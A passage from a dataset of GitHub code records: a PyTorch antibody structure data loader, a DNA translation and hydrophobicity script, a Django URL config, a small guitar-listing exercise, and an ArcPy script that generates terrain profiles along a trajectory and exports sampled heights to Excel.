i\n\n return torch.Tensor([min_i, max_i]).type(torch.int)\n\n @staticmethod\n def get_dist_bins(num_bins):\n first_bin = 4\n bins = [\n (first_bin + 0.5 * i, first_bin + 0.5 + 0.5 * i)\n for i in range(num_bins - 2)\n ]\n bins.append((bins[-1][1], float(\"Inf\")))\n bins.insert(0, (0, first_bin))\n return bins\n\n @staticmethod\n def 
get_omega_bins(num_bins):\n first_bin = -180\n bin_width = 2 * 180 / num_bins\n bins = [\n (first_bin + bin_width * i, first_bin + bin_width * (i + 1))\n for i in range(num_bins)\n ]\n return bins\n\n @staticmethod\n def get_theta_bins(num_bins):\n first_bin = -180\n bin_width = 2 * 180 / num_bins\n bins = [\n (first_bin + bin_width * i, first_bin + bin_width * (i + 1))\n for i in range(num_bins)\n ]\n return bins\n\n @staticmethod\n def get_phi_bins(num_bins):\n first_bin = 0\n bin_width = 180 / num_bins\n bins = [\n (first_bin + bin_width * i, first_bin + bin_width * (i + 1))\n for i in range(num_bins)\n ]\n return bins\n\n @staticmethod\n def get_bin_values(bins):\n bin_values = [t[0] for t in bins]\n bin_width = (bin_values[2] - bin_values[1]) / 2\n bin_values = [v + bin_width for v in bin_values]\n bin_values[0] = bin_values[1] - 2 * bin_width\n return bin_values\n\n @classmethod\n def bin_dist_angle_matrix(cls, dist_angle_mat, num_bins=26):\n dist_bins = cls.get_dist_bins(num_bins)\n omega_bins = cls.get_omega_bins(num_bins)\n theta_bins = cls.get_theta_bins(num_bins)\n phi_bins = cls.get_phi_bins(num_bins)\n\n binned_matrix = torch.zeros(dist_angle_mat.shape, dtype=torch.long)\n for i, (lower_bound, upper_bound) in enumerate(dist_bins):\n bin_mask = (dist_angle_mat[0] >= lower_bound).__and__(\n dist_angle_mat[0] < upper_bound\n )\n binned_matrix[0][bin_mask] = i\n for i, (lower_bound, upper_bound) in enumerate(omega_bins):\n bin_mask = (dist_angle_mat[1] >= lower_bound).__and__(\n dist_angle_mat[1] < upper_bound\n )\n binned_matrix[1][bin_mask] = i\n for i, (lower_bound, upper_bound) in enumerate(theta_bins):\n bin_mask = (dist_angle_mat[2] >= lower_bound).__and__(\n dist_angle_mat[2] < upper_bound\n )\n binned_matrix[2][bin_mask] = i\n for i, (lower_bound, upper_bound) in enumerate(phi_bins):\n bin_mask = (dist_angle_mat[3] >= lower_bound).__and__(\n dist_angle_mat[3] < upper_bound\n )\n binned_matrix[3][bin_mask] = i\n\n return binned_matrix\n\n def __getitem__(self, index):\n for i in range(5):\n pdb = self._pdb_file_list[(index + i) % len(self._pdb_file_list)]\n fasta = self._fasta_dir.joinpath(pdb.stem + \".fasta\")\n if not fasta.exists():\n self.convert_pdb_to_fasta(pdb=pdb, fasta=fasta)\n\n seq_list = self.get_sequences(fasta=fasta)\n if len(seq_list) != 2:\n LOG.warning(\"skip %s, it has %d chains\", fasta, len(seq_list))\n continue\n\n seq_num_list = []\n for seq in seq_list.values():\n seq_num = []\n for amino in seq:\n seq_num.append(AMINO_TO_NUM[amino])\n seq_num_list.append(torch.Tensor(seq_num).type(torch.uint8))\n\n dist_angle = self.get_label_from_pdb(pdb=pdb)\n bin_mat = self.bin_dist_angle_matrix(dist_angle)\n\n h3 = self.get_h3_cdr_indices(pdb=pdb)\n\n return (\n pdb.stem,\n F.one_hot(seq_num_list[0].long()),\n F.one_hot(seq_num_list[1].long()),\n bin_mat,\n h3,\n )\n\n def __len__(self) -> int:\n return len(self._pdb_file_list)\n\n @staticmethod\n def merge_samples_to_minibatch(samples):\n samples.sort(key=lambda x: len(x[2]), reverse=True)\n return H3AntibodyBatch(zip(*samples)).data()\n\n\nclass H3AntibodyBatch:\n def __init__(self, batch_data):\n (\n self.id_,\n self.heavy_prim,\n self.light_prim,\n self.dist_angle_mat,\n self.h3,\n ) = batch_data\n\n @staticmethod\n def pad_data_to_same_shape(tensor_list, pad_value=0):\n shapes = torch.Tensor([_.shape for _ in tensor_list])\n target_shape = torch.max(shapes.transpose(0, 1), dim=1)[0].int()\n\n padded_dataset_shape = [len(tensor_list)] + list(target_shape)\n padded_dataset = 
torch.Tensor(*padded_dataset_shape)\n for i, data in enumerate(tensor_list):\n padding = reversed(\n target_shape - torch.Tensor(list(data.shape)).int()\n )\n\n padding = F.pad(padding.unsqueeze(0).t(), (1, 0, 0, 0)).view(-1, 1)\n padding = padding.view(1, -1)[0].tolist()\n\n padded_data = F.pad(data, padding, value=pad_value)\n padded_dataset[i] = padded_data\n\n return padded_dataset\n\n def data(self):\n return self.features(), self.labels()\n\n def features(self):\n \"\"\"Gets the one-hot encoding of the sequences with a feature that\n delimits the chains\"\"\"\n X = [torch.cat(_, 0) for _ in zip(self.heavy_prim, self.light_prim)]\n X = self.pad_data_to_same_shape(X, pad_value=0)\n\n X = F.pad(X, (0, 1, 0, 0, 0, 0))\n for i, h_prim in enumerate(self.heavy_prim):\n X[i, len(h_prim) - 1, X.shape[2] - 1] = 1\n\n return X.transpose(1, 2).contiguous()\n\n def labels(self):\n \"\"\"Gets the distance matrix data of the batch with -1 padding\"\"\"\n label_mat = (\n self.pad_data_to_same_shape(self.dist_angle_mat, pad_value=-1)\n .transpose(0, 1)\n .long()\n )\n\n return label_mat\n\n def batch_mask(self):\n \"\"\"Gets the mask data of the batch with zero padding\"\"\"\n \"\"\"Code to use when masks are added\n masks = self.mask\n masks = pad_data_to_same_shape(masks, pad_value=0)\n return masks\n \"\"\"\n raise NotImplementedError(\"Masks have not been added to antibodies yet\")\n","repo_name":"hhk7734/h3","sub_path":"h3/dataset/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":14200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"36875313929","text":"__author__ = 'anb2126'\n# Translation of genetic code to protein\n# Step 1) Split up sequence in to codons\n# Step 2) Translate each codon to amino acid\n# Step 3) Assemble chain of amino acids\n# Step 4) Convert polypeptide to list of janin hydrophobicity values (integers)\n# Step 5) Plot janin integers on plot of aa position (x) vs janin value\n# Step 6) Find electrodensity size scale (Pymol?)\n# Step 7) Repeat steps 4-6 with size scale\n# Step 8) Find method to overlay/compare other picorna Vp1s using the above\n\n# Code for method which does not print non-codons at end\n\ngencode = {\n 'ATA':'I', 'ATC':'I', 'ATT':'I', 'ATG':'M',\n 'ACA':'T', 'ACC':'T', 'ACG':'T', 'ACT':'T',\n 'AAC':'N', 'AAT':'N', 'AAA':'K', 'AAG':'K',\n 'AGC':'S', 'AGT':'S', 'AGA':'R', 'AGG':'R',\n 'CTA':'L', 'CTC':'L', 'CTG':'L', 'CTT':'L',\n 'CCA':'P', 'CCC':'P', 'CCG':'P', 'CCT':'P',\n 'CAC':'H', 'CAT':'H', 'CAA':'Q', 'CAG':'Q',\n 'CGA':'R', 'CGC':'R', 'CGG':'R', 'CGT':'R',\n 'GTA':'V', 'GTC':'V', 'GTG':'V', 'GTT':'V',\n 'GCA':'A', 'GCC':'A', 'GCG':'A', 'GCT':'A',\n 'GAC':'D', 'GAT':'D', 'GAA':'E', 'GAG':'E',\n 'GGA':'G', 'GGC':'G', 'GGG':'G', 'GGT':'G',\n 'TCA':'S', 'TCC':'S', 'TCG':'S', 'TCT':'S',\n 'TTC':'F', 'TTT':'F', 'TTA':'L', 'TTG':'L',\n 'TAC':'Y', 'TAT':'Y', 'TAA':'_', 'TAG':'_',\n 'TGC':'C', 'TGT':'C', 'TGA':'_', 'TGG':'W'}\n\njanin_code = {\n 'I': 0.7, 'F': 0.5, 'V': 0.6, 'L': 0.5, 'W': 0.3, 'M': 0.4,\n 'A': 0.3, 'G': 0.3, 'C': 0.9, 'Y': -0.4, 'P': -0.3, 'T': -0.2,\n 'S': -0.1, 'H': -0.1, 'E': -0.7, 'N': -0.5, 'Q': -0.7, 'D': -0.6, 'K': -1.8, 'R': -1.4}\n\nkd_code = {\n 'I': 4.5, 'F': 2.8, 'V': 4.2, 'L': 3.8, 'W': -0.9, 'M': 1.9, 'A': 1.8, 'G': -0.4, 'C': 2.5,\n 'Y': -1.3, 'P': -1.6, 'T': -0.7, 'S': -0.8, 'H': -3.2, 'E': -3.5, 'N': -3.5, 'Q': -3.5,\n 'D': -3.5, 'K': -3.9, 'R': -4.5}\n\new_code = {\n 'I' : 0.73, \"F\" : 0.61, 'V': 0.54, 'L': 0.53, 'W': 0.37, 'M': 0.26, 'A': 0.25,\n 'G': 0.16, 'C': 0.04, 'Y': 0.02, 'P': -0.07, 'T': -0.18, 'S': -0.26, 'H': -0.40,\n 'E': -0.62, 'N': -0.64, 'Q': -0.69, 'D': -0.72, 'K': -1.10, 'R': -1.8}\n\n\n\ndef translate_dna(dna):\n last=len(dna)-2\n print(last)\n polypep=\"\"\n for base in range(0,last,3):\n codon=dna[base:base+3]\n print(\"Codon:\",codon)\n amino=gencode.get(codon.upper(), 'X')\n print(amino)\n polypep+=amino\n print(polypep)\n return(polypep)\n\ndef janin_scale(polypep):\n janin_points = []\n for aa in polypep:\n janin = janin_code.get(aa)\n print(janin)\n janin_points.append(janin)\n print(\"\\n Janin_points:\", janin_points )\n return [janin_points]\n\ndef kd_scale(polypep):\n kd_points = []\n for aa in polypep:\n kd = kd_code.get(aa)\n print(kd)\n kd_points.append(kd)\n print(\"\\n Kyte and Doolittle points:\", kd_points)\n return [kd_points]\n\ndef ew_scale(polypep):\n ew_points = []\n for aa in polypep:\n ew = ew_code.get(aa)\n print(ew)\n ew_points.append(ew)\n print(\"\\n Eisenberg Weis points:\", ew_points)\n return [ew_points]\n\ndna=input(\"Paste Sequence for Translation Here:\")\n\ndna=dna.upper()\n\ntranslate_dna(dna)\n\npp = translate_dna(dna)\n\njanin_scale(pp)\n\nkd_scale(pp)\n\new_scale(pp)\n","repo_name":"ashbnyc/polypeptides-","sub_path":"translation.py","file_name":"translation.py","file_ext":"py","file_size_in_byte":3212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"72268761647","text":"from django.contrib import admin\nfrom django.urls import path, include\nfrom rest_framework.routers import DefaultRouter\n\nfrom users.views import (\n CustomerModelViewSet,\n StoreModelViewSet,\n)\n\nrouter = DefaultRouter()\nrouter.register(\"Customer\", CustomerModelViewSet, basename=\"customer\")\nrouter.register(\"Store\", StoreModelViewSet, basename=\"store\")\n\nurlpatterns = (\n [\n path('admin/', admin.site.urls),\n path('api/', include(\"api.urls\")),\n path('auth/', include(\"djoser.urls\")),\n path('auth/', include(\"djoser.urls.jwt\")), \n ]\n + router.urls\n)\n","repo_name":"AsjadIftikhar/Panda-Mall","sub_path":"project/backend/backend/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"2"}
+{"seq_id":"40757616077","text":"\"\"\"Guitar program\"\"\"\nfrom guitar import Guitar\n\nguitars = []\n\n\ndef main():\n \"\"\"Guitar program is worked by Guitar class\"\"\"\n\n print(\"My guitars!\")\n name = input(\"Name: \")\n while name != \"\":\n year = int(input(\"year: \"))\n cost = float(input(\"Cost: $\"))\n add_information = Guitar(name, year, cost)\n guitars.append(add_information)\n print(add_information, \"added.\")\n name = input(\"Name: \")\n\n guitars.append(Guitar(\"Gibson L-5 CES\", 1922, 16035.40))\n guitars.append(Guitar(\"Line 6 JTV-59\", 2010, 1512.9))\n\n if guitars:\n guitars.sort() # sorting by year through the __lt__ method in Guitar class\n print(\"These are my guitars:\")\n for thing, things in enumerate(guitars): # display number of guitar\n vintage_string = \"\"\n if things.is_vintage():\n vintage_string = \"(vintage)\"\n print(\"Guitar {}: {:>20} ({}), worth ${:10,.2f}{}\".format(thing, things.name,\n things.year, things.cost,\n vintage_string))\n else:\n print(\"No guitars\")\n\n\nmain()\n","repo_name":"TheRealJayLuong/cp1404","sub_path":"prac_06/guitars.py","file_name":"guitars.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"33602076284","text":"import arcpy\nimport numpy as np\nimport pandas as pd\nimport math\n# from base import *\narcpy.env.overwriteOutput = True\n\n# params\ngrid_size = 5 #m\ninput_gdb = r\"C:\\Users\\vince\\Documents\\ArcGIS\\Projects\\rasters willem oktober\\input_rasters.gdb\"#database\noutput_gdb = r\"C:\\Users\\vince\\Documents\\ArcGIS\\Projects\\rasters willem oktober\\output_rasters.gdb\"#database\ntrajectory = r\"C:\\Users\\vince\\Documents\\ArcGIS\\Projects\\rasters willem oktober\\input_rasters.gdb\\trajectlijn_demo\"\ncode = \"code\"\nfieldnames =['profielnummer', 'afstand', 'z_ahn', 'x', 'y']\nxls_outputloc = r\"C:\\Users\\vince\\Desktop\\ssh_output\"\nraster_prefix = \"inputraster\"\n\nprofile_length_river = 30 #m\nprofile_length_land = 30 #m\nprofile_interval = 20 #m\npoint_interval = 5 #m\n\n\ndef CopyParallelL(plyP,sLength): #functie voor profielen maken haaks op trajectlijn\n part=plyP.getPart(0)\n lArray=arcpy.Array()\n for ptX in part:\n dL=plyP.measureOnLine(ptX)\n ptX0=plyP.positionAlongLine (dL-0.01).firstPoint\n ptX1=plyP.positionAlongLine (dL+0.01).firstPoint\n dX=float(ptX1.X)-float(ptX0.X)\n dY=float(ptX1.Y)-float(ptX0.Y)\n lenV=math.hypot(dX,dY)\n sX=-dY*sLength/lenV;sY=dX*sLength/lenV\n leftP=arcpy.Point(ptX.X+sX,ptX.Y+sY)\n lArray.add(leftP)\n array = arcpy.Array([lArray])\n section=arcpy.Polyline(array)\n return section\n\ndef CopyParallelR(plyP,sLength): #functie voor profielen maken haaks op trajectlijn\n part=plyP.getPart(0)\n rArray=arcpy.Array()\n for ptX in part:\n dL=plyP.measureOnLine(ptX)\n ptX0=plyP.positionAlongLine (dL-0.01).firstPoint\n ptX1=plyP.positionAlongLine (dL+0.01).firstPoint\n dX=float(ptX1.X)-float(ptX0.X)\n dY=float(ptX1.Y)-float(ptX0.Y)\n lenV=math.hypot(dX,dY)\n sX=-dY*sLength/lenV;sY=dX*sLength/lenV\n rightP=arcpy.Point(ptX.X-sX, ptX.Y-sY)\n rArray.add(rightP)\n array = arcpy.Array([rArray])\n section=arcpy.Polyline(array)\n return section\n\ndef excelWriterTraject(uitvoerpunten,excel, veldnamen):\n # df van profielpunten\n array = arcpy.da.FeatureClassToNumPyArray(uitvoerpunten, veldnamen)\n df = pd.DataFrame(array)\n\n #export excel\n df.to_excel(excel) \n\n print (\"Excel gemaakt van profieldata\")\n\n\ndef copy_trajectory_lr(trajectlijn,code,afstand):\n existing_fields = arcpy.ListFields(trajectlijn)\n needed_fields = ['OBJECTID','OBJECTID_1','Shape','Shape_Length','SHAPE', 'SHAPE_Length',code]\n for field in existing_fields:\n if field.name not in needed_fields:\n arcpy.DeleteField_management(trajectlijn, field.name)\n\n arcpy.AddField_management(trajectlijn, \"Width\", \"DOUBLE\", 2, field_is_nullable=\"NULLABLE\")\n arcpy.CalculateField_management(trajectlijn, \"Width\", afstand, \"PYTHON\")\n\n arcpy.management.CopyFeatures(trajectlijn, \"river\")\n arcpy.management.CopyFeatures(trajectlijn, \"land\")\n land = \"land\"\n river = \"river\"\n\n\n with arcpy.da.UpdateCursor(land, (\"Shape@\", \"Width\")) as cursor:\n for shp, w in cursor:\n LeftLine = CopyParallelL(shp, w)\n cursor.updateRow((LeftLine, w))\n\n with arcpy.da.UpdateCursor(river, (\"Shape@\", \"Width\")) as cursor:\n for shp, w in cursor:\n RightLine = CopyParallelR(shp, w)\n cursor.updateRow((RightLine, w))\n\n print ('Trajectlijnen-offset gemaakt')\n\n\ndef generate_profiles(profiel_interval,profiel_lengte_land,profiel_lengte_rivier,trajectlijn,code,profielen):\n # traject to points\n arcpy.GeneratePointsAlongLines_management(trajectlijn, 'traject_punten', 'DISTANCE', Distance=profiel_interval, Include_End_Points='NO_END_POINTS')\n 
arcpy.AddField_management('traject_punten', \"profielnummer\", \"DOUBLE\", 2, field_is_nullable=\"NULLABLE\")\n arcpy.AddField_management('traject_punten', \"lengte_landzijde\", \"DOUBLE\", 2, field_is_nullable=\"NULLABLE\")\n arcpy.AddField_management('traject_punten', \"lengte_rivierzijde\", \"DOUBLE\", 2, field_is_nullable=\"NULLABLE\")\n arcpy.CalculateField_management('traject_punten', \"profielnummer\", '!OBJECTID!', \"PYTHON\")\n arcpy.CalculateField_management('traject_punten', \"lengte_landzijde\", profiel_lengte_land, \"PYTHON\")\n arcpy.CalculateField_management('traject_punten', \"lengte_rivierzijde\", profiel_lengte_rivier, \"PYTHON\")\n\n # route voor trajectlijn\n # arcpy.CreateRoutes_lr(trajectlijn, code, \"route_traject\", \"LENGTH\", \"\", \"\", \"UPPER_LEFT\", \"1\", \"0\", \"IGNORE\", \"INDEX\")\n\n existing_fields = arcpy.ListFields(trajectlijn)\n needed_fields = ['OBJECTID','OBJECTID_1', 'SHAPE', 'SHAPE_Length','Shape','Shape_Length',code]\n for field in existing_fields:\n if field.name not in needed_fields:\n arcpy.DeleteField_management(trajectlijn, field.name)\n arcpy.AddField_management(trajectlijn, \"van\", \"DOUBLE\", 2, field_is_nullable=\"NULLABLE\")\n arcpy.AddField_management(trajectlijn, \"tot\", \"DOUBLE\", 2, field_is_nullable=\"NULLABLE\")\n arcpy.CalculateField_management(trajectlijn, \"van\", 0, \"PYTHON\")\n # arcpy.CalculateField_management(trajectlijn, \"tot\", \"!Shape_Length!\", \"PYTHON\")\n arcpy.CalculateField_management(trajectlijn, \"tot\", \"round(!shape.length!)\", \"PYTHON\")\n arcpy.CreateRoutes_lr(trajectlijn, code, 'route_traject', \"TWO_FIELDS\", \"van\", \"tot\", \"\", \"1\",\n \"0\", \"IGNORE\", \"INDEX\")\n\n\n # locate profielpunten\n arcpy.LocateFeaturesAlongRoutes_lr('traject_punten', 'route_traject', code, \"1.5 Meters\", 'tabel_traject_punten',\n \"RID POINT MEAS\", \"FIRST\", \"DISTANCE\", \"ZERO\", \"FIELDS\",\n \"M_DIRECTON\")\n\n # offset rivierdeel profiel\n arcpy.MakeRouteEventLayer_lr('route_traject', code, 'tabel_traject_punten', \"rid POINT meas\", 'deel_rivier',\n \"lengte_rivierzijde\", \"NO_ERROR_FIELD\", \"NO_ANGLE_FIELD\", \"NORMAL\", \"ANGLE\", \"RIGHT\",\n \"POINT\")\n\n arcpy.MakeRouteEventLayer_lr('route_traject', code, 'tabel_traject_punten', \"rid POINT meas\", 'deel_land',\n \"lengte_landzijde\", \"NO_ERROR_FIELD\", \"NO_ANGLE_FIELD\", \"NORMAL\", \"ANGLE\", \"LEFT\",\n \"POINT\")\n # temp inzicht layer\n arcpy.management.CopyFeatures('deel_rivier', \"temp_rivierdeel\")\n arcpy.management.CopyFeatures('deel_land', \"temp_landdeel\")\n arcpy.AddField_management('temp_rivierdeel', \"id\", \"DOUBLE\", 2, field_is_nullable=\"NULLABLE\")\n arcpy.AddField_management('temp_landdeel', \"id\", \"DOUBLE\", 2, field_is_nullable=\"NULLABLE\")\n arcpy.CalculateField_management('temp_rivierdeel', \"id\", 2, \"PYTHON\")\n arcpy.CalculateField_management('temp_landdeel', \"id\", 1, \"PYTHON\")\n\n arcpy.Merge_management(\"'temp_rivierdeel';'temp_landdeel'\", 'merge_profielpunten')\n arcpy.PointsToLine_management('merge_profielpunten', profielen, \"profielnummer\", \"id\", \"NO_CLOSE\")\n\n arcpy.SpatialJoin_analysis(profielen, trajectlijn, 'profielen_temp', \"JOIN_ONE_TO_ONE\", \"KEEP_ALL\", match_option=\"INTERSECT\")\n arcpy.management.CopyFeatures('profielen_temp', profielen)\n # arcpy.FlipLine_edit(profielen)\n\n print ('Profielen gemaakt op trajectlijn')\n\ndef set_measurements_trajectory(profielen,trajectlijn,code,stapgrootte_punten): #rechts = rivier, profielen van binnen naar buiten\n # clean feature\n 
existing_fields = arcpy.ListFields(profielen)\n needed_fields = ['OBJECTID', 'SHAPE', 'SHAPE_Length','Shape','Shape_Length','profielnummer']\n for field in existing_fields:\n if field.name not in needed_fields:\n arcpy.DeleteField_management(profielen, field.name)\n\n # add needed fields\n #arcpy.AddField_management(profielen, \"profielnummer\", \"DOUBLE\", 2, field_is_nullable=\"NULLABLE\")\n arcpy.AddField_management(profielen, \"van\", \"DOUBLE\", 2, field_is_nullable=\"NULLABLE\")\n arcpy.AddField_management(profielen, \"tot\", \"DOUBLE\", 2, field_is_nullable=\"NULLABLE\")\n\n #arcpy.CalculateField_management(profielen, \"profielnummer\", '!OBJECTID!', \"PYTHON\")\n\n # split profiles\n rivierlijn = \"river\"\n landlijn = \"land\"\n clusterTolerance = 0\n invoer = [profielen, trajectlijn]\n uitvoer = 'snijpunten_centerline'\n arcpy.Intersect_analysis(invoer, uitvoer, \"\", clusterTolerance, \"point\")\n arcpy.SplitLineAtPoint_management(profielen, uitvoer, 'profielsplits', 1)\n\n velden = ['profielnummer', 'van', 'tot',code]\n\n fieldmappings = arcpy.FieldMappings()\n fieldmappings.addTable('profielsplits')\n fieldmappings.addTable(rivierlijn)\n fieldmappings.addTable(landlijn)\n keepers = velden\n\n # join splits to river/land parts\n for field in fieldmappings.fields:\n if field.name not in keepers:\n fieldmappings.removeFieldMap(fieldmappings.findFieldMapIndex(field.name))\n\n arcpy.SpatialJoin_analysis('profielsplits', rivierlijn, 'profieldeel_rivier', \"JOIN_ONE_TO_ONE\", \"KEEP_COMMON\", fieldmappings,\n match_option=\"INTERSECT\")\n arcpy.SpatialJoin_analysis('profielsplits', landlijn, 'profieldeel_land', \"JOIN_ONE_TO_ONE\", \"KEEP_COMMON\",\n fieldmappings,\n match_option=\"INTERSECT\")\n\n # create routes\n arcpy.CalculateField_management(\"profieldeel_rivier\", \"tot\", '!Shape_Length!', \"PYTHON\")\n arcpy.CalculateField_management(\"profieldeel_land\", \"tot\", '!Shape_Length!', \"PYTHON\")\n arcpy.CalculateField_management(\"profieldeel_rivier\", \"van\", 0, \"PYTHON\")\n arcpy.CalculateField_management(\"profieldeel_land\", \"van\", 0, \"PYTHON\")\n\n\n arcpy.CreateRoutes_lr('profieldeel_rivier', \"profielnummer\", \"routes_rivier_\", \"TWO_FIELDS\", \"van\", \"tot\", \"\", \"1\", \"0\",\n \"IGNORE\", \"INDEX\")\n\n arcpy.CreateRoutes_lr('profieldeel_land', \"profielnummer\", \"routes_land_\", \"TWO_FIELDS\", \"tot\", \"van\", \"\", \"1\",\n \"0\", \"IGNORE\", \"INDEX\")\n\n #join code\n velden = ['profielnummer',code]\n fieldmappings = arcpy.FieldMappings()\n fieldmappings.addTable('routes_land_')\n fieldmappings.addTable('routes_rivier_')\n fieldmappings.addTable(trajectlijn)\n\n keepers = velden\n for field in fieldmappings.fields:\n if field.name not in keepers:\n fieldmappings.removeFieldMap(fieldmappings.findFieldMapIndex(field.name))\n\n arcpy.SpatialJoin_analysis('routes_rivier_', trajectlijn, 'routes_rivier', \"JOIN_ONE_TO_ONE\", \"KEEP_COMMON\",\n fieldmappings,\n match_option=\"INTERSECT\")\n arcpy.SpatialJoin_analysis('routes_land_', trajectlijn, 'routes_land', \"JOIN_ONE_TO_ONE\", \"KEEP_COMMON\",\n fieldmappings,\n match_option=\"INTERSECT\")\n\n # generate points\n arcpy.GeneratePointsAlongLines_management('routes_land', 'punten_land', 'DISTANCE', Distance= stapgrootte_punten)\n arcpy.GeneratePointsAlongLines_management('routes_rivier', 'punten_rivier', 'DISTANCE', Distance=stapgrootte_punten)\n\n\n # id field for joining table\n arcpy.AddField_management('punten_land', 'punt_id', \"DOUBLE\", field_precision=2, field_is_nullable=\"NULLABLE\")\n 
arcpy.AddField_management('punten_rivier', 'punt_id', \"DOUBLE\", field_precision=2, field_is_nullable=\"NULLABLE\")\n arcpy.CalculateField_management(\"punten_land\", \"punt_id\", '!OBJECTID!', \"PYTHON\")\n arcpy.CalculateField_management(\"punten_rivier\", \"punt_id\", '!OBJECTID!', \"PYTHON\")\n\n\n # find points along routes\n Output_Event_Table_Properties = \"RID POINT MEAS\"\n arcpy.LocateFeaturesAlongRoutes_lr('punten_land', 'routes_land', \"profielnummer\", \"1 Meters\",\n 'uitvoer_tabel_land', Output_Event_Table_Properties, \"FIRST\", \"DISTANCE\", \"ZERO\",\n \"FIELDS\", \"M_DIRECTON\")\n arcpy.LocateFeaturesAlongRoutes_lr('punten_rivier', 'routes_rivier', \"profielnummer\", \"1 Meters\",\n 'uitvoer_tabel_rivier', Output_Event_Table_Properties, \"FIRST\", \"DISTANCE\", \"ZERO\",\n \"FIELDS\", \"M_DIRECTON\")\n\n # join fields from table\n arcpy.JoinField_management('punten_land', 'punt_id', 'uitvoer_tabel_land', 'punt_id', 'MEAS')\n arcpy.JoinField_management('punten_rivier', 'punt_id', 'uitvoer_tabel_rivier', 'punt_id', 'MEAS')\n arcpy.AlterField_management('punten_land', 'MEAS', 'afstand',clear_field_alias=\"CLEAR_ALIAS\")\n arcpy.AlterField_management('punten_rivier', 'MEAS', 'afstand',clear_field_alias=\"CLEAR_ALIAS\")\n\n with arcpy.da.UpdateCursor('punten_rivier', ['profielnummer', 'afstand']) as cursor:\n for row in cursor:\n row[1] = row[1]*-1\n cursor.updateRow(row)\n\n # fieldmappings = arcpy.FieldMappings()\n # fieldmappings.addTable('punten_land')\n # fieldmappings.addTable('punten_rivier')\n # fieldmappings.addTable('snijpunten_centerline')\n\n # velden = ['profielnummer', 'afstand', code]\n # keepers = velden\n\n # for field in fieldmappings.fields:\n # if field.name not in keepers:\n # fieldmappings.removeFieldMap(fieldmappings.findFieldMapIndex(field.name))\n\n arcpy.FeatureToPoint_management(\"snijpunten_centerline\", \"punten_centerline\")\n arcpy.management.Merge(['punten_land', 'punten_rivier','punten_centerline'], 'punten_profielen')\n\n arcpy.management.CalculateField(\"punten_profielen\", \"afstand\", 'round(!afstand!, 1)', \"PYTHON3\")\n\n # set centerline values to 0\n with arcpy.da.UpdateCursor('punten_profielen', ['afstand']) as cursor:\n for row in cursor:\n if row[0] == None:\n row[0] = 0\n cursor.updateRow(row)\n\n print ('Meetpunten op routes gelokaliseerd')\n\ndef extract_z_arcpy(invoerpunten, uitvoerpunten, raster): #\n\n # Test de ArcGIS Spatial Analyst extension license\n arcpy.CheckOutExtension(\"Spatial\")\n\n # Koppel z-waardes\n arcpy.sa.ExtractValuesToPoints(invoerpunten, raster, uitvoerpunten, \"NONE\", \"VALUE_ONLY\")\n\n # Pas het veld 'RASTERVALU' aan naar 'z_ahn'\n arcpy.AlterField_management(uitvoerpunten, 'RASTERVALU', 'z_ahn')\n print ('Hoogtewaarde aan punten gekoppeld')\n\ndef add_xy(uitvoerpunten,code,trajectlijn):\n\n existing_fields = arcpy.ListFields(uitvoerpunten)\n needed_fields = ['OBJECTID', 'Shape', 'profielnummer', 'afstand', 'z_ahn', code]\n for field in existing_fields:\n if field.name not in needed_fields:\n arcpy.DeleteField_management(trajectlijn, field.name)\n\n arcpy.env.outputCoordinateSystem = arcpy.Describe(uitvoerpunten).spatialReference\n # Set local variables\n in_features = uitvoerpunten\n properties = \"POINT_X_Y_Z_M\"\n length_unit = \"\"\n area_unit = \"\"\n coordinate_system = \"\"\n\n # Generate the extent coordinates using Add Geometry Properties tool\n arcpy.AddGeometryAttributes_management(in_features, properties, length_unit,\n area_unit,\n coordinate_system)\n\n 
arcpy.AlterField_management(uitvoerpunten, 'POINT_X', 'x')\n arcpy.AlterField_management(uitvoerpunten, 'POINT_Y', 'y')\n\n print ('XY-coordinaten aan punten gekoppeld')\n\n\ndef rewrite_rasters():\n\n arcpy.env.workspace = input_gdb\n arcpy.env.overwriteOutput = True\n\n # set environment to input\n input_rasters = arcpy.ListRasters(\"*\")\n for raster in input_rasters:\n raster = str(raster)\n if raster.startswith(raster_prefix) == True:\n raster_output = raster+\"_{}\".format(str(grid_size)+\"m\")\n # raster naar punten vertalen\n arcpy.conversion.RasterToPoint(raster, \"tempraster_points\", \"Value\")\n # # punten interpoleren met IDW en gewenste gridgrootte\n arcpy.ddd.Idw(\"tempraster_points\", \"grid_code\", output_gdb+\"/\"+raster_output, grid_size, 2, \"VARIABLE 12\", None)\n\n print (\"raster written to grid size: {}\".format(grid_size))\n\ndef profiles_part1():\n # switch environment to ouput\n arcpy.env.workspace = output_gdb\n arcpy.env.overwriteOutput = True\n output_rasters = arcpy.ListRasters(\"*\")\n for raster in output_rasters:\n raster = str(raster)\n if raster.startswith(raster_prefix) == True:\n profiles = \"profiles_{}\".format(str(raster))\n input_points = \"punten_profielen\"\n output_points = \"points_profiles_z\"\n excel = xls_outputloc+\"/\"+ \"output_profiles_{}\".format(str(raster)+\".xlsx\")\n # profielen trekken\n generate_profiles(profile_interval, profile_length_land, profile_length_river, trajectory, code, profiles)\n\n copy_trajectory_lr(trajectory,code,10)\n\n set_measurements_trajectory(profiles, trajectory, code, point_interval)\n\n extract_z_arcpy(input_points,output_points,raster)\n\n add_xy(output_points, code,trajectory)\n\n excelWriterTraject(output_points, excel, fieldnames)\n\n arcpy.AddField_management(profiles, \"midpoint_x\", \"DOUBLE\", 2, field_is_nullable=\"NULLABLE\")\n arcpy.AddField_management(profiles, \"midpoint_y\", \"DOUBLE\", 2, field_is_nullable=\"NULLABLE\")\n arcpy.AddField_management(profiles, \"bearing_1\", \"DOUBLE\", 2, field_is_nullable=\"NULLABLE\")\n arcpy.AddField_management(profiles, \"bearing_2\", \"DOUBLE\", 2, field_is_nullable=\"NULLABLE\")\n arcpy.AddField_management(profiles, \"half_length\", \"DOUBLE\", 2, field_is_nullable=\"NULLABLE\")\n\n\n\ndef find_steepest_profile():\n arcpy.env.workspace = output_gdb\n arcpy.env.overwriteOutput = True\n output_rasters = arcpy.ListRasters(\"*\")\n for raster in output_rasters:\n raster = 